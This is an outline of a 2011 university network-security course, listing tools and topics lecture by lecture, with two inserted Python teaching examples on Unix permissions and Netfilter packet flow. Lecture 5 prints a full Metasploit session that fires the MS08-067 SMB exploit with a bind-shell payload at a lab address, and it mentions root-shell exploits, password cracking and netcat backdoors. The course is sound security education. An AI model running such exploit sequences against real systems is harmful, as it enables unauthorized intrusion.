Summary of CS4238 Lectures
Lecture 1 (15/08/2011)
Lecture topic: Module Overview, and administrative information
Lecture 2 (22/08/2011)
Lecture topic: Linux overview and system administration
Skills and tools:
- Installation of Ubuntu Linux
- Understanding common Linux file system structure
  - /etc, /etc/passwd, /etc/shadow
  - /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin
  - /dev, /boot, /proc
  - /tmp, /var, /var/log
- Interface to the on-line reference manuals: man
  - Example: man man, man ls, man -k password, man 1 write, man 2 write
- Editor: vi, pico, gedit
- Process control: &, ps, kill, fg, bg
- File system commands: ls, cd, pwd, rm, mkdir, rmdir
- File system access control: chmod, chown, chgrp
  - Understanding the UNIX access control string (rwxrwxrwx) and its numerical encoding
  - Understanding special permissions, such as set-uid
  - Example: chmod u+x myfile, chmod 4755 myexecutable
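The permission encoding listed above, worked through as an added example (this is not code from the lecture notes; Python is used here because the point is the bit layout, not a particular shell). It converts between the symbolic string printed by ls -l and the numeric mode given to chmod, covers the set-uid, set-gid and sticky bits that occupy the leading digit (so chmod 4755 corresponds to rwsr-xr-x), and includes a small audit of what a set-uid mode implies. All inputs are strings; no file on disk is touched.

```python
# Added example (not from the lecture notes): translating between the symbolic
# permission string printed by `ls -l` (rwxrwxrwx) and the numeric mode passed to
# chmod, including the set-uid, set-gid and sticky bits, plus a short audit of
# what a set-uid mode implies. Pure string handling; nothing on disk is touched.
from __future__ import annotations
from typing import List

# class index (0 = user, 1 = group, 2 = other) -> special bit and its ls character
SPECIAL_BIT = {0: 4, 1: 2, 2: 1}         # set-uid, set-gid, sticky
SPECIAL_CHAR = {0: "s", 1: "s", 2: "t"}  # shown in the execute slot when the bit is set


def symbolic_to_octal(perm: str) -> str:
    """'rwsr-xr-x' -> '4755', 'rwxr-xr-x' -> '0755', 'rwSr--r--' -> '4644'.

    A capital S or T means the special bit is set but the execute bit is not.
    """
    if len(perm) != 9:
        raise ValueError("expected a 9-character string such as rwxr-xr-x")
    special, digits = 0, []
    for cls in range(3):
        r, w, x = perm[cls * 3: cls * 3 + 3]
        if r not in "r-" or w not in "w-":
            raise ValueError(f"unexpected character in {perm!r}")
        value = (4 if r == "r" else 0) + (2 if w == "w" else 0)
        if x.lower() == SPECIAL_CHAR[cls]:      # s/S or t/T in this class's slot
            special += SPECIAL_BIT[cls]
            value += 1 if x.islower() else 0    # lowercase also carries the execute bit
        elif x == "x":
            value += 1
        elif x != "-":
            raise ValueError(f"unexpected character {x!r} in {perm!r}")
        digits.append(value)
    return f"{special}{digits[0]}{digits[1]}{digits[2]}"


def octal_to_symbolic(mode: str) -> str:
    """Inverse mapping: '4755' -> 'rwsr-xr-x', '755' -> 'rwxr-xr-x', '1777' -> 'rwxrwxrwt'."""
    mode = mode.zfill(4)                      # chmod accepts 3 digits; pad the special digit
    if len(mode) != 4 or any(c not in "01234567" for c in mode):
        raise ValueError("expected up to four octal digits such as 4755")
    special, out = int(mode[0]), []
    for cls, value in enumerate(int(c) for c in mode[1:]):
        out.append("r" if value & 4 else "-")
        out.append("w" if value & 2 else "-")
        has_x = bool(value & 1)
        if special & SPECIAL_BIT[cls]:
            out.append(SPECIAL_CHAR[cls] if has_x else SPECIAL_CHAR[cls].upper())
        else:
            out.append("x" if has_x else "-")
    return "".join(out)


def setuid_findings(perm: str) -> List[str]:
    """Why a mode deserves a second look: set-uid/set-gid programs run with the
    owner's or group's identity, so they must never be writable by anyone else."""
    mode = symbolic_to_octal(perm)
    special, group, other = int(mode[0]), int(mode[2]), int(mode[3])
    findings = []
    if special & 4:
        findings.append("set-uid: executes with the file owner's user id")
    if special & 2:
        findings.append("set-gid: executes with the file's group id")
    if findings and (group & 2 or other & 2):
        findings.append("group- or world-writable: others can change the privileged program")
    return findings


if __name__ == "__main__":
    # the lecture's chmod 4755 myexecutable, seen from both directions
    print(octal_to_symbolic("4755"), symbolic_to_octal("rwsr-xr-x"))
    print(setuid_findings("rwsrwxrwx"))
```

The audit function is the practical point: a set-uid bit is harmless on its own, but combined with a group- or world-writable mode it lets any local user replace the code that runs with the owner's privileges, which is what a permissions review on /usr/bin and /usr/sbin is looking for.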
Lecture 3 (29/08/2011)
Lecture topic: Reconnaissance and Scanning
Milestones: Form project team, finish setting up Linux on the external USB drive
Skills and tools:
- Google Hacking: searching with directives and search operators
- Whois database: whois
  - Example: whois nus.edu.sg
- DNS query: nslookup, dig
- Configure a network interface or find our system's IP address: ifconfig
  - Example: ifconfig, ifconfig eth0, ifconfig eth0 192.168.0.125 netmask 255.255.255.0
- Network mapping: ping, traceroute
  - Example: ping 192.168.0.1, ping ivle.nus.edu.sg, traceroute www.google.com
- GUI-based network mapping tool: Cheops-ng
- Port scanning: nmap, zenmap
  - Try all possible command line options of nmap
- Package maintenance: apt-get, apt-cache
  - Example, searching for the package nmap: apt-cache search nmap
  - Installing and removing a package: sudo apt-get install nmap, sudo apt-get remove nmap
  - GUI-based package manager: sudo synaptic, or start it from the system menu System->Administration->Synaptic Package Manager
Lecture 4 (05/09/2011)
Lecture topic: Vulnerability scanning, buffer overflow exploits and analysis
Skills and tools:
- Nessus vulnerability scanner: basic configuration and scanning
- GDB
  - Breakpoints: break, delete
    - Set a breakpoint at function func: break func
    - Set a breakpoint at memory address addr: break *addr
    - Set a breakpoint at line number N of the current source file: break N
    - Set a breakpoint at line number N of source file F: break F:N
    - Delete a breakpoint: delete
  - Executing the program and stepping: run, step, stepi, next, nexti
    - Start the debugged program: run
    - Execute one line of source code: step
    - Execute one machine instruction: stepi
    - Execute one line of source code without stepping into functions: next
    - Execute one machine instruction without stepping into functions: nexti
  - Examining the environment and program state:
Resources:
Lecture 5 (12/09/2011)
Lecture topic: Buffer overflow attacks, exploit engine, buffer overflow defense, password attacks
Skills and tools:
- Using GDB to understand buffer overflow attacks and defense mechanisms
- Creating exploits to get root shell
- Metasploit framework
  - Start the Metasploit framework: msfconsole
  - Subcommands: use, set RHOST, set PAYLOAD, exploit
  - A sample session; the text in green is the prompts from the shell and msfconsole:
    $ msfconsole
    msf > use exploit/windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > set RHOST 192.168.10.2
    msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell_bind_tcp
    msf exploit(ms08_067_netapi) > exploit
- John the Ripper password cracker
Resources:
Lecture 6 (19/09/2011)
Lecture topic: Linux network administration and firewall
Skills and tools:
- Configuring network settings of a host computer
  - IP address, network mask, gateway, and DNS
  - Static configuration and DHCP
- Configuring network settings of a router
  - Enabling IP forwarding in Linux
  - The ifconfig utility
- Linux firewall
  - The Netfilter framework: PREROUTING, FORWARD, POSTROUTING, INPUT, OUTPUT
  - Path of packets
  - Firewall rules
  - The iptables tool
- Sharing an IP address by network address translation (NAT)
- Creating a virtual network interface and connecting a QEMU virtual machine to the virtual network interface
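The Netfilter items above (the five hooks, the path a packet takes through them, the effect of IP forwarding, chain policies and NAT) as an added example that is not part of the lecture notes: a small Python model of a two-interface Linux router that traces one packet through the chains and reports the verdict. It simplifies real iptables by keeping one rule list per chain (no separate filter and nat tables, no connection tracking), and the addresses, interface names and rules are constructed for illustration.

```python
# Added example (not from the lecture notes): a model of how a packet walks the
# Netfilter hooks on a Linux router, so the effect of IP forwarding, chain
# policies and NAT (MASQUERADE) can be traced without root or a real machine.
# Simplification: one rule list per chain (no separate filter/nat tables, no
# connection tracking). All addresses and interfaces below are constructed.
from __future__ import annotations
from dataclasses import dataclass, field, replace
from typing import Callable, Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    in_iface: Optional[str]           # None means generated by this host
    out_iface: Optional[str] = None   # filled in by the routing decision
    dport: int = 0


@dataclass
class Rule:
    match: Callable[[Packet], bool]
    target: str                       # ACCEPT, DROP or MASQUERADE


@dataclass
class Router:
    iface_addr: Dict[str, str]        # interface -> its own address
    routes: Dict[str, str]            # destination prefix -> out interface ("" = default route)
    ip_forward: bool = False          # /proc/sys/net/ipv4/ip_forward
    chains: Dict[str, List[Rule]] = field(default_factory=dict)
    policy: Dict[str, str] = field(default_factory=dict)   # chain -> default verdict

    def route(self, dst: str) -> str:
        """Longest matching prefix wins; the "" entry acts as the default route."""
        prefix = max((p for p in self.routes if dst.startswith(p)), key=len)
        return self.routes[prefix]


def run_chain(router: Router, chain: str, pkt: Packet) -> Tuple[str, Packet]:
    """First matching rule wins; otherwise the chain's policy (ACCEPT if unset)."""
    for rule in router.chains.get(chain, []):
        if rule.match(pkt):
            if rule.target == "MASQUERADE":
                # source NAT: rewrite the source to the outgoing interface's address
                return "ACCEPT", replace(pkt, src=router.iface_addr[pkt.out_iface])
            return rule.target, pkt
    return router.policy.get(chain, "ACCEPT"), pkt


def trace(router: Router, pkt: Packet) -> Tuple[str, List[str], Packet]:
    """Return (verdict, hooks visited, packet as it leaves) for one packet."""
    visited: List[str] = []

    def step(chain: str) -> str:
        nonlocal pkt
        visited.append(chain)
        verdict, pkt = run_chain(router, chain, pkt)
        return verdict

    if pkt.in_iface is not None:                        # arrived on an interface
        if step("PREROUTING") == "DROP":
            return "DROP", visited, pkt
        if pkt.dst in router.iface_addr.values():        # routing decision: addressed to us
            verdict = step("INPUT")
            return verdict, visited, pkt
        if not router.ip_forward:                        # not for us and forwarding is off
            visited.append("routing decision: forwarding disabled")
            return "DROP", visited, pkt
        pkt = replace(pkt, out_iface=router.route(pkt.dst))
        if step("FORWARD") == "DROP":
            return "DROP", visited, pkt
    else:                                               # generated by a local process
        pkt = replace(pkt, out_iface=router.route(pkt.dst))
        if step("OUTPUT") == "DROP":
            return "DROP", visited, pkt
    verdict = step("POSTROUTING")
    return verdict, visited, pkt


def build_home_router(ip_forward: bool = True) -> Router:
    """Constructed example: eth0 faces the Internet, eth1 faces the 192.168.0.0/24 LAN."""
    def from_lan(p: Packet) -> bool:
        return p.src.startswith("192.168.0.")

    return Router(
        iface_addr={"eth0": "203.0.113.5", "eth1": "192.168.0.1"},
        routes={"192.168.0.": "eth1", "": "eth0"},
        ip_forward=ip_forward,
        chains={
            "INPUT": [Rule(lambda p: from_lan(p) and p.dport == 22, "ACCEPT")],   # SSH from the LAN only
            "FORWARD": [Rule(lambda p: p.in_iface == "eth1", "ACCEPT")],           # LAN hosts may go out
            "POSTROUTING": [Rule(lambda p: p.out_iface == "eth0", "MASQUERADE")],  # share the WAN address
        },
        policy={"INPUT": "DROP", "FORWARD": "DROP"},
    )


if __name__ == "__main__":
    r = build_home_router()
    verdict, hops, out = trace(r, Packet("192.168.0.10", "198.51.100.7", "eth1", dport=80))
    print(verdict, hops, "source after NAT:", out.src)
```

Two behaviours worth noticing when running it: with ip_forward set to False the LAN packet dies at the routing decision and never reaches FORWARD, which is why enabling /proc/sys/net/ipv4/ip_forward is a prerequisite for any router firewall rule to matter; and an inbound packet from eth0 for a LAN host is dropped by the FORWARD policy even though nothing matched it, which is the default-deny posture the rules rely on.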
Resources:
Lecture 7 (26/09/2011)
Lecture topic: Fuzzing, vulnerability detection, binary analysis
Skills and tools:
- The SPIKE fuzzer
  - Understanding SPIKE scripts
- Open-source package configuration
- Using GDB to analyze program crashes
- (Optional) BitBlaze platform
  - Using BitBlaze's taint tracking utility to detect buffer overflow exploits
Resources:
Lecture 8 (03/10/2011)
Lecture topic: Network attacks, sniffing, IP spoofing, session hijacking, and denial-of-service
Skills and tools:
- Wireshark
- The netwox utility
  - Packet spoofing, resetting connections, session hijacking
- Netcat
  - File transfer, port scanning, connecting to open ports, vulnerability scanning, creating backdoors, and relaying traffic
Resources:
Lecture 9 (10/10/2011)
Lecture topic: Malware analysis, trojans and backdoors, user-level rootkits, kernel-level rootkits, botnets
Skills and tools:
- Analyzing program behavior through system call tracing
- Understanding the basic concepts of rootkit mechanisms and detection mechanisms
- (Optional) Virtual machine introspection using BitBlaze
Lecture 10 (17/10/2011)
Lecture topic: Web session cloning, CSRF attacks, SQL injection, cross-site scripting, drive-by download
Skills and tools:
- Configuring the Apache server
- Intercepting and understanding web requests
  - TamperData Firefox extension
  - Paros Proxy
Resources:
Lecture 11 (24/10/2011)
Lecture topic: Guest lecture on web attacks.
Lecture 12 (31/10/2011)
Lecture topic: Review
Resources:
- Whole disk encryption
- eCryptfs: Enterprise Cryptographic Filesystem
Lecture 13 (8/11/2011, 9/11/2011)
Lecture topic: Practice session